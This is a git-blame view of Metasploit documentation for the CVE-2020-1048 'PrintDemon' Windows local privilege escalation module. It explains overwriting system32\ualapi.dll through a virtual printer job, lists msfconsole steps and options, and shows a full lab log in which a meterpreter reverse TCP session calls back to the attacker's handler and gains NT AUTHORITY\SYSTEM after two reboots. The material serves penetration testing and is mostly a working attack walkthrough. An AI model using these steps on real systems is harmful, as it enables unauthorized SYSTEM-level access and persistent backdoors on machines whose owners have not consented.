adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

185 lines
6.9 KiB
Markdown
Raw Normal View History

More Rubocop, add documentation, and typo fix
2020-08-24 14:52:42 -05:00
## Vulnerable Application
Vulnerable versions for exploit
All unpatched windows through version 2003
### Introduction
This exploit relies on a bug where you can create a virtual printer
and print to trusted locations on the filesystem. If a user chooses the
default overwrite, it may create a permanent backdoor.
Basically, this exploit creates a print job that writes to a trusted
location. By selecting the location ```C:\windows\system32\ualapi.dll```
we abuse the spooler service twice. The spooler will print to this
location when it restarts, then it will load the DLL into itself when it
restarts a second time. The DLL will then be running as ```SYSTEM```.
Logic errors and typos
2020-08-25 15:20:20 -05:00
When the printer is created, the target will show a pop-up saying a
spelling fixes on docs
2023-10-10 14:46:18 -04:00
printer was created.
remove copy/pasta code and fix version check
2020-08-24 17:17:27 -05:00
A larger issue here is that the Spooler service does not like to stop.
Logic errors and typos
2020-08-25 15:20:20 -05:00
Trying `sc stop` Spooler does not stop the spooler.
More Rubocop, add documentation, and typo fix
2020-08-24 14:52:42 -05:00
Killing the pid with a trusted process will kill it, but it restarts
automatically.
Logic errors and typos
2020-08-25 15:20:20 -05:00
Using the `pendingFileRenameOperations` registry key also does not appear
More Rubocop, add documentation, and typo fix
2020-08-24 14:52:42 -05:00
to work.
## Verification Steps
Start ```msfconsole```
get session on a windows target that is not patched (and <= 2003)
```use windows/local/cve_2020_1048_printerdemon```
```set session <session>```
```set payload <payload>```
```set lhost <lhost>```
```set lport <lport>```
```run```
Verify target reboots automagically if
reboot target again (yest it has to reboot again
Verify you get a session
## Options
**EXECUTE_DELAY**
The time between uploading and running the exploit. Default is 3
seconds, but high-latency networks may require more time.
**EXPLOIT_NAME**
The name of the when it is uploaded to the target (%RAND% by default).
**EXPLOIT_DIR**
Directory to use for file upload and linking; this should not already
exist. (%RAND% by default)
**OVERWRITE_DLL**
The remote location you would like to write to. Default is
```C:\windows\system32\ualapi.dll```
**PAYLOAD_NAME**
The filename to use for the payload binary (%RAND% by default).
This is the name of the dll payload when uploaded to the remote host.
**RESTART_TARGET**
This will restart the target to force the overwrite. YOU WILL LOSE
YOUR SESSION unless you have a method of persistence.
The dll will not be run until a second reboot.
**WRITEABLE_DIR**
The directory to use the payload binary and uploaded payload.
(%RAND% by default).
## Scenarios
### Tested on Windows10 x64 Release 1903
```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 2
[*] Started reverse TCP handler on 192.168.135.197:5555
msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200262 bytes) to 192.168.132.134
[*] Meterpreter session 2 opened (192.168.135.197:5555 -> 192.168.132.134:49675) at 2020-08-24 12:15:07 -0500
msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : DESKTOP-CL5L2IH
OS : Windows 10 (10.0 Build 18362).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: DESKTOP-CL5L2IH\msfuser
meterpreter > getsystem
[-] 2001: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 2...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/local/cve_2020_1048_printerdemon
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > show options
Module options (exploit/windows/local/cve_2020_1048_printerdemon):
Name Current Setting Required Description
---- --------------- -------- -----------
EXECUTE_DELAY 3 yes The number of seconds to delay between file upload and exploit launch
EXPLOIT_NAME no The filename to use for the exploit binary (%RAND% by default).
OVERWRITE_DLL no Filename to overwrite (%WINDIR%\system32\ualapi.dll by default).
PAYLOAD_NAME no The filename for the payload to be used on the target host (%RAND%.dll by default).
RESTART_TARGET true yes Restart the target after exploit (you will lose your session until a second reboot).
SESSION 1 yes The session to run this module on.
WRITABLE_DIR no Path to write binaries (%TEMP% by default).
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.135.197 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set verbose true
verbose => true
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set disablepayloadhandler false
disablepayloadhandler => false
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set wfsdelay 600
wfsdelay => 600
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > run
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set session 2
session => 2
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > run
[*] Started reverse TCP handler on 192.168.135.197:4444
[*] Checking Target
[*] Attempting to PrivEsc on DESKTOP-CL5L2IH via session ID: 2
[*] Build Number = 18362
[*] Uploading Payload
[*] Payload (5120 bytes) uploaded on DESKTOP-CL5L2IH to C:\Users\msfuser\AppData\Local\Temp\UCPNtlof
[!] This exploit requires manual cleanup of the payload C:\Users\msfuser\AppData\Local\Temp\UCPNtlof
[*] Sleeping for 3 seconds before launching exploit
[*] Uploading exploit to DESKTOP-CL5L2IH as C:\Users\msfuser\AppData\Local\Temp\JkrbEDShseh.exe
[*] Exploit uploaded on DESKTOP-CL5L2IH to C:\Users\msfuser\AppData\Local\Temp\JkrbEDShseh.exe
[*] Running Exploit
[*] Exploit output:
Printer created successfully
[*] Rebooting DESKTOP-CL5L2IH
[*] 192.168.132.134 - Meterpreter session 2 closed. Reason: Died
```
After the auto-reboot, reboot again.
The first reboot performs the overwrite; the second loads the dll.
```
[*] Sending stage (200262 bytes) to 192.168.132.134
[*] Meterpreter session 3 opened (192.168.135.197:4444 -> 192.168.132.134:49669) at 2020-08-24 12:19:49 -0500
meterpreter > sysinfo
Computer : DESKTOP-CL5L2IH
OS : Windows 10 (10.0 Build 18362).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
Reference in New Issue Copy Permalink